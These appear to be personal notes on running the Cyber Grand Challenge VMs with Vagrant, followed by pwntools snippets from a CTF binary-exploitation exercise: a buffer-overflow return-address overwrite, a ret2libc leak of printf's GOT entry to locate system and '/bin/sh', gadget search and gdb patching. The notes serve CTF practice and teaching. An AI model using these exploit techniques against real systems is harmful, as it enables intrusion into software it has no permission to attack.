

  • vagrant is a tool for managing VM images.
    • https://www.vagrantup.com/
  • VirtualBox
    • https://www.virtualbox.org/
  • CGC environment configuration file (Vagrantfile)
    • https://s3.amazonaws.com/cgcdist/boxes/Vagrantfile
  • CGC description
    • https://github.com/CyberGrandChallenge/cgc-release-documentation/blob/master/walk-throughs/virtual-competiton.md



1. Download the virtual machines with the vagrant command.


Copy the CGC environment configuration file (Vagrantfile) into the vagrant folder, then run vagrant up from there.


2016-08-02  오후 02:28    <DIR>          .
2016-08-02  오후 02:28    <DIR>          ..
2016-08-02  오후 02:28    <DIR>          .vagrant
2015-12-21  오후 10:33         2,526,208 vagrant.exe
2016-08-02  오후 12:14             2,573 Vagrantfile

C:\HashiCorp\Vagrant\bin>vagrant.exe up
Bringing machine 'cb' up with 'virtualbox' provider...
Bringing machine 'ids' up with 'virtualbox' provider...
Bringing machine 'pov' up with 'virtualbox' provider...
Bringing machine 'crs' up with 'virtualbox' provider...
Bringing machine 'ti' up with 'virtualbox' provider...
==> cb: Checking if box 'cgc-linux-dev' is up to date...
==> cb: Clearing any previously set forwarded ports...
==> cb: Clearing any previously set network interfaces...
==> cb: Preparing network interfaces based on configuration...
    cb: Adapter 1: nat
    cb: Adapter 2: hostonly
==> cb: Forwarding ports...
    cb: 22 (guest) => 2222 (host) (adapter 1)
==> cb: Running 'pre-boot' VM customizations...
==> cb: Booting VM...
==> cb: Waiting for machine to boot. This may take a few minutes...
    cb: SSH address: 127.0.0.1:2222
    cb: SSH username: vagrant
    cb: SSH auth method: private key

............

C:\HashiCorp\Vagrant\bin>vagrant.exe status
Current machine states:

cb                        running (virtualbox)
ids                       running (virtualbox)
pov                       running (virtualbox)
crs                       running (virtualbox)
ti                        running (virtualbox)

This environment represents multiple VMs. The VMs are all listed
above with their current state. For more information about a specific
VM, run `vagrant status NAME`.

.....................

C:\HashiCorp\Vagrant\bin>vagrant.exe ssh crs
`ssh` executable not found in any directories in the %PATH% variable. Is an
SSH client installed? Try installing Cygwin, MinGW or Git, all of which
contain an SSH client. Or use your favorite SSH client with the following
authentication information shown below:

Host: 127.0.0.1
Port: 2202
Username: vagrant
Private key: C:/Users/JP20614/.vagrant.d/insecure_private_key

2. To use the PuTTY client, a private key in PuTTY format must be generated with puttygen.exe (from the insecure_private_key shown above).


3. PuTTY client settings

  - ID : vagrant

  - IP : 127.0.0.1

  - Port : 2202


4. CGC server descriptions

  • ti - this is the Team Interface. The role represents the interface that will be provided to a CRS by the CFE infrastructure.
  • cb - this is the Challenge Binary server. This is the host where CBs are executed.
  • pov - this is the POV server. This role has the responsibility of 'throwing' POVs (and polls) at the cb server.
  • crs - this is a host for simulating a CRS. While no simulated CRS capabilities are distributed as part of Virtual Competition, a sample client is provided to exercise the Team Interface.
  • ids - this is the IDS host; the network appliance. Filters fielded by a CRS will be installed on ids. From a network perspective, ids is in between pov and cb.





[ pwn example code ]

 

from pwn import *

# r = process('./pwn1')           # local run
r = remote('127.0.0.1', 1234)     # remote target

# '-1' is the first input, followed by 44 bytes of padding up to the saved
# return address, which is overwritten with 0x080484cd
# (little-endian bytes \xcd\x84\x04\x08).
payload = b'-1'
payload += b'a' * 44
payload += p32(0x080484cd)
payload += b'\n'

print('[*] payload\n%s' % hexdump(payload))

r.sendline(payload)
print(r.recv())

# r.interactive()

 

[ Sending an XML file ]


from pwn import *

r = remote('127.0.0.1', 1234)

# Read the XML file as bytes so it is sent exactly as stored.
payload = open('crattack.xml', 'rb').read()

# Wait for the prompt that ends with 'XML)' before sending.
print(r.recvuntil(b'XML)'))

r.sendline(payload)

r.interactive()



 

[ Checking which library functions are used ]

 

babyhack@ubuntu:~/tmp/sctf2016/pwn2$ readelf -r ./pwn2

Relocation section '.rel.dyn' at offset 0x2fc contains 2 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
08049ffc  00000306 R_386_GLOB_DAT    00000000   __gmon_start__
0804a040  00000705 R_386_COPY        0804a040   stdout

Relocation section '.rel.plt' at offset 0x30c contains 6 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a00c  00000107 R_386_JUMP_SLOT   00000000   printf
0804a010  00000207 R_386_JUMP_SLOT   00000000   getchar
0804a014  00000307 R_386_JUMP_SLOT   00000000   __gmon_start__
0804a018  00000407 R_386_JUMP_SLOT   00000000   __libc_start_main
0804a01c  00000507 R_386_JUMP_SLOT   00000000   setvbuf
0804a020  00000607 R_386_JUMP_SLOT   00000000   atoi
babyhack@ubuntu:~/tmp/sctf2016/pwn2$  

 

 

[ How to find the offsets ]

 

# babyhack@ubuntu:~/tmp/sctf2016/pwn2$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep 'system' | more
#   244: 00115db0    68 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.0
#   621: 0003b160    56 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
#  1445: 0003b160    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0

# babyhack@ubuntu:~/tmp/sctf2016/pwn2$ strings -a -tx /lib/i386-linux-gnu/libc.so.6 | grep '/bin/sh'
# 15f5db /bin/sh

# babyhack@ubuntu:~/tmp/sctf2016/pwn2$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep 'printf' | more
#.............................
#   641: 0004a130    45 FUNC    GLOBAL DEFAULT   12 printf@@GLIBC_2.0
#.............................

# Offsets inside libc.so.6, taken from the readelf/strings output above.
offset_printf = 0x4A130
offset_system = 0x3B160
offset_binsh = 0x15F5DB

#------------ printf_got leak -------#
#    +----------------------------+
#    |       aaaaaa.....aaaa      |   padding up to the saved return address
#    +----------------------------+
#    |          printf_plt        |   return into printf@plt
#    +----------------------------+
#    |            vuln()          |   printf's return address: back into vuln()
#    +----------------------------+
#    |            '%s'            |   1st argument: address of a "%s" string
#    +----------------------------+
#    |          printf_got        |   2nd argument: printf's GOT entry (libc address)
#    +----------------------------+

# The snippet on the page assumes these names are defined earlier; they are
# resolved here with pwntools as placeholders (adjust to the target binary).
elf = ELF('./pwn2')
s = process('./pwn2')

PAD_LEN = 0                                    # placeholder: padding length is not given on the page
payload = b'a' * PAD_LEN
printf_plt = p32(elf.plt['printf'])
printf_got = p32(elf.got['printf'])
vuln = p32(elf.symbols['vuln'])                # assumes the binary has a 'vuln' symbol
string_format = p32(next(elf.search(b'%s')))  # assumes a "%s" string exists in the binary

payload += printf_plt
payload += vuln
payload += string_format
payload += printf_got

print('[*] payload\n%s\n' % hexdump(payload))

s.sendline(payload)

print('[*] first recv\n%s\n' % s.recvline())
print('[*] second recv\n%s\n' % s.recvline())

# printf("%s", printf_got) writes the 4 raw bytes of printf's libc address.
printf_got_leak = s.recvline()
print('[*] printf got\n%s\n' % hexdump(printf_got_leak))

libc_printf_got = u32(printf_got_leak[:4])

print('[*] lib_printf_got : ', hex(libc_printf_got))

# libc base = leaked printf address - printf offset; everything else is base + offset.
libc_addr = libc_printf_got - offset_printf
system_addr = libc_addr + offset_system
binsh_addr = libc_addr + offset_binsh

print('[*] libc addr : ', hex(libc_addr))
print('[*] system addr : ', hex(system_addr))
print('[*] /bin/sh addr : ', hex(binsh_addr))
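The following is an added example and not code from the original post. It parses the readelf -s and strings -tx output shown above into symbol offsets (instead of copying the hex values by hand) and then repeats the base-address arithmetic of the snippet from a leaked printf address, adding the sanity check a practitioner wants: the recovered libc base must be page-aligned, otherwise the offsets belong to a different libc build or the leak was truncated. It needs only the standard library; the leak bytes are constructed, and the 0xb7e00000 base used in the demo is a hypothetical value.

```python
import re
import struct

# Constructed sample input: the readelf -s rows and the strings -tx row quoted above.
READELF_SYMS = """\
   244: 00115db0    68 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.0
   621: 0003b160    56 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
  1445: 0003b160    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
   641: 0004a130    45 FUNC    GLOBAL DEFAULT   12 printf@@GLIBC_2.0
"""
STRINGS_OUT = "15f5db /bin/sh\n"

# readelf -s row layout: Num: Value Size Type Bind Vis Ndx Name
SYM_RE = re.compile(
    r"^\s*\d+:\s+([0-9a-f]+)\s+\d+\s+(\w+)\s+(\w+)\s+\w+\s+\S+\s+(\S+)\s*$"
)


def parse_readelf_symbols(text):
    """Map bare function names (version suffix stripped) to their offset in the ELF."""
    symbols = {}
    for line in text.splitlines():
        m = SYM_RE.match(line)
        if not m:
            continue
        value, sym_type, _bind, name = m.groups()
        if sym_type != "FUNC":
            continue
        name = name.split("@")[0]          # 'system@@GLIBC_2.0' -> 'system'
        symbols.setdefault(name, int(value, 16))
    return symbols


def parse_strings_offsets(text):
    """Map each string printed by `strings -a -tx` to its hex file offset."""
    offsets = {}
    for line in text.splitlines():
        parts = line.strip().split(None, 1)
        if len(parts) == 2:
            offsets[parts[1]] = int(parts[0], 16)
    return offsets


def libc_base_from_leak(leak, printf_offset):
    """Decode a 4-byte little-endian leak of printf's address and derive the libc base.

    Raises ValueError when the result is not page-aligned, which means the
    offsets come from a different libc build or the leak was cut short.
    """
    if len(leak) < 4:
        raise ValueError("leak shorter than 4 bytes")
    leaked_printf = struct.unpack("<I", leak[:4])[0]
    base = leaked_printf - printf_offset
    if base & 0xFFF:
        raise ValueError("libc base 0x%x is not page-aligned: wrong libc or truncated leak" % base)
    return base


def resolve(base, symbols, strings):
    """Rebase the symbols the snippet needs onto the recovered libc base."""
    return {
        "system": base + symbols["system"],
        "/bin/sh": base + strings["/bin/sh"],
    }


def demo():
    symbols = parse_readelf_symbols(READELF_SYMS)
    strings = parse_strings_offsets(STRINGS_OUT)
    # Constructed leak: printf at hypothetical base 0xb7e00000 + 0x4a130 = 0xb7e4a130.
    leak = struct.pack("<I", 0xB7E00000 + symbols["printf"])
    base = libc_base_from_leak(leak, symbols["printf"])
    return base, resolve(base, symbols, strings)


if __name__ == "__main__":
    base, addrs = demo()
    print("[*] libc addr : %#x" % base)
    for name, addr in addrs.items():
        print("[*] %s addr : %#x" % (name, addr))
```

Parsing the tool output rather than retyping the values avoids the classic off-by-one-nibble mistake when copying offsets, and the alignment check fails early on the host side instead of producing a crash that is hard to attribute.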

 

[ Finding gadgets ]

 

https://github.com/0vercl0k/rp

 

# ./rp++ -f ./pwn2 -r 4 | grep 'pop'
# 0x0804864e: pop edi ; pop ebp ; ret  ;  (1 found)
ppr = p32(0x0804864E)  # the call takes two arguments, so a pop; pop; ret gadget removes them before the next return

 

[ gdb code patch ]

 

(gdb) set *(unsigned char*)0x400cc3 = 0x90
(gdb) set *(unsigned char*)0x400cc4 = 0x90
(gdb) set *(unsigned char*)0x400ccd = 0x90
(gdb) set *(unsigned char*)0x400cce = 0x90
(gdb) set *(unsigned char*)0x400cd7 = 0x90
(gdb) set *(unsigned char*)0x400cd8 = 0x90
(gdb) disas main 

 

 

 

 


 

[Test code]

 

from pwn import *

elf = ELF('./a.out')
# rop = ROP(elf)
libc = ELF("/lib/i386-linux-gnu/libc.so.6")

# Distance between printf and system inside libc; it does not change under ASLR
# because both symbols move together with the library base.
printf_system_offset = libc.symbols['printf'] - libc.symbols['system']

printf_plt = elf.plt['printf']
printf_got = elf.got['printf']

write_plt = elf.plt['write']
write_got = elf.got['write']

libc_start_main = elf.plt['__libc_start_main']

print('[*] printf@plt : %s' % hex(printf_plt))
print('[*] printf@got : %s' % hex(printf_got))
print('[*] write@plt : %s' % hex(write_plt))
print('[*] write@got : %s' % hex(write_got))
print('[*] printf - system : %s(%d)' % (hex(printf_system_offset), printf_system_offset))

print('[*] lib_strat_main : %s' % hex(libc_start_main))

 

[Execution result]

 

[*] printf@plt : 0x8048500
[*] printf@got : 0x804c010
[*] write@plt : 0x8048590
[*] write@got : 0x804c034
[*] printf - system : 0xefd0(61392)
[*] lib_strat_main : 0x8048580

 


 

